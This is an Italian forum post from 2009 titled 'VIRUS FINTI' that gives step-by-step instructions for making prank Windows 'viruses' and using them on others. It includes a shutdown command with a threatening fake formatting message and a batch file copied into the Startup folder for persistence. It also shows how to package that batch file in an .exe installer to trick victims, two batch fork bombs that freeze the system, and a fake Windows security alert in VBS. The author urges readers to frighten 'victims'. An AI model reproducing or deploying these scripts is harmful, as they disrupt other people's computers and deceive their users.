IL FORUM DI SIMONE PERAINO

forum

IndiceCalendarioFAQCercaLista UtentiGruppiRegistratiAccedi

Condividi | 

VIRUS FINTI

Andare in basso 
AutoreMessaggio
Admin
Admin

MessaggioTitolo: VIRUS FINTI   Dom Feb 08, 2009 11:12 pm

Il "Virus" Shutdown

Oggi ho deciso di insegnarvi come creare un' altra sottospecie di virus che comunque, a chi ne sà poco, incute terrore.
Questo "Virus" spegne il computer in un tempo da voi definito e con un messaggio da voi scelto.
Innanzitutto clicchiamo con il tasto destro del mouse sul desktop e creiamo un nuovo collegamento.
Adesso nella barra che compare scriviamo questa stringa:

shutdown -s -t 120 (60-180 quello che volete) -c "testo"

potete modificare a piacimento il tempo (espresso dal numero in secondi) ed il testo che dovrà apparire.
In seguito vi verrà richiesto di dare un nome al collegamento...
Ora, logicamente avrete capito che l'unica possibilità che abbiamo per far impaurire qualcuno è quella di scrivere un messaggio minaccioso come: attenzione allo scadere del tempo il computer si spegnerà e subirà una formattazione.

divertitevi pure a scrivere di tutto e non dimenticatevi di riferire le vostre idee più belle.....(e naturalmente le reazioni più belle delle vostre vittime).

Come creare un virus in .exe

Oggi impareremo a creare un virus con solo 2 script in basch e un programmino da scaricare: Install Creator (serve per creare dei file installabili in .exe)

Prima di iniziare voglio fare insieme a voi dei ragionamenti:

I virus che per ora vi ho insegnato a fare (e spero che vi bastino) sono 2: "UGO" e "Shutdown".
Per fare le vostre prove vi consiglio fortemente di utilizzare "shutdown" con un tempo di chiusura molto alto (3 minuti possono bastare) per ovvi motivi... ;*]

Cominciamo:

prima di tutto dobbiamo scrivere il virus "vero e proprio".

Con il blocco note scriviamo:

start shutdown -s -t 180 -c "Sei stato contaminato (insomma: il testo)"

poi salviamo come documento ".bat" (praticamente è il virus "Shutdown" scritto in Batch), (che io lo chiamerò virus.bat).
Ora creiamo una nuova cartella (che io chiamerò "vir") e mettiamoci dentro il virus in batch.
Creiamo ancora un altra cartella (che io chiamerò "programma") e mettiamoci dentro la cartella precedente.

(praticamente ora io ho questo tipo di percorso: \programma\vir\virus.bat\)

Ora dobbiamo accendere un attimo il cervello e pensare all'ipotetico percorso dove si potrebbe installare il virus:

(nel mio caso C:\Programmi\programma\vir\virus.bat\).

Se riuscite ad immaginarvi questo siete già a metà strada e vi posso inserire questo nuovo comando in batch (che io chiamerò copyto):

copy C:\Programmi\programma\vir\*.* c:\Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\*.*

Questo è il comando fondamentale che ci permette di far copiare tutto il contenuto dell'ipotetica cartella "vir" nella cartella Esecuzione automatica: ecco a voi il metodo per attivare il virus ad ogni accenzione di Windows.

[N.B. questo comando non è eseguibile al 100% poichè gli spazzi non sono accettati come tali dal linguaggio batch: è l'unica cosa che ho deciso di non dirvi per "non darvi la pistola carica" eticamente parlando ma se siete veramente interessati con una "ricerchina" si trova di tutto (e di più)]

Continuiamo: dopo che lo avete salvato come file.bat (io l'ho chiamato copyto) mettetelo dentro l'ultima cartela che avete creato (per me la cartella "programma").

Adesso siamo pronti per utilizzare il programma che vi ho fatto scaricare e installare: Install Creator

Apriamolo: clicchiamo "avanti"; ora scegliamo la cartella che contiene i nostri file (nel mio caso proprio la cartella "programma"); adesso scegliamo italiano e inseriamo il nome del prodotto (attenzione il nome del prodotto deve coincidere con il nome della cartella dove avevate inserito tutto altrimenti dovrete modificare il comando copyto); scegliete un impostazione grafica (potete anche vedere l'anteprima); inserite eventuali informazioni sul file (tipo: CRETINO,STAI PER INSTALLARE UN VIRUS); poi vi farà scegliere dove volete che sia installata la cartella (e se avete seguito le mie istruzioni dovrebbe andare bene quella che vi suggerisce);il passaggio seguente è anche trascurabile dato che l'utente non avrà bisogno di avere un icona nel menù d'avvio dopo che il computer sarà inagibile; è molto importante adesso scegliere come programma da eseguire dopo l'installazione il file che copia il virus nella cartella Esecuzione Automatica (praticamente il file "copyto"): selezionarlo cliccando sul secondo "Browse" e scegliendo "all files" come tipo di file; potete finire con le impostazioni.
Adesso se avete fatto tutto per benino avrete "finalmente" realizzato il vostro primo virus che si presenta sul vostro desktop come un file ".exe".

Un altro virus finto

Copiate questo codice sul blocco note:

:infinitedos
@start
@echo addio…
@start
@Goto infinitedos

salvate con nome: nomefile.bat

Apritelo… e godetevi lo spettacolo!!

Creiamo in 2 secondi un virus che blocca il sistema operativo

Ho deciso di farvi creare un virus che è in grado di bloccare totalmente Windows.
Bene sappiate che per bloccare Windows bastano due rige:

start (nomefile).bat
(nomefile).bat

Ma procediamo con calma:
Vogliamo creare un virus che si chiama UGO. Seguiamo il seguente procedimento:

1)Apriamo un normalissimo documento di testo.

2)Scriviamo:

start UGO.bat
UGO.bat

3)Clicchiamo su File>Salva con nome... lo chiamiamo: UGO.bat

4)Adesso, ameno che non vogliate bloccare il sistema, non aprite il file UGO.bat

Un altro virus finto

-Apri Blocco Note
-Scrivi:

lol=msgbox(”Il tuo messaggio”,20,”Avviso Protezione di Windows”)

-Salva con estensione .vbs
Torna in alto Andare in basso
Visualizza il profilo http://simoneperainoforum.forumattivo.it

VIRUS FINTI
Pagina 1 di 1
 Argomenti simili
-
» finti sandali
» Finti sandali
» Screpolature sui talloni
» Salute e pregiudizi
» Virus su Passionetennis?

Permessi di questa sezione del forum:Non puoi rispondere agli argomenti in questo forum
IL FORUM DI SIMONE PERAINO :: Virus-
Vai verso: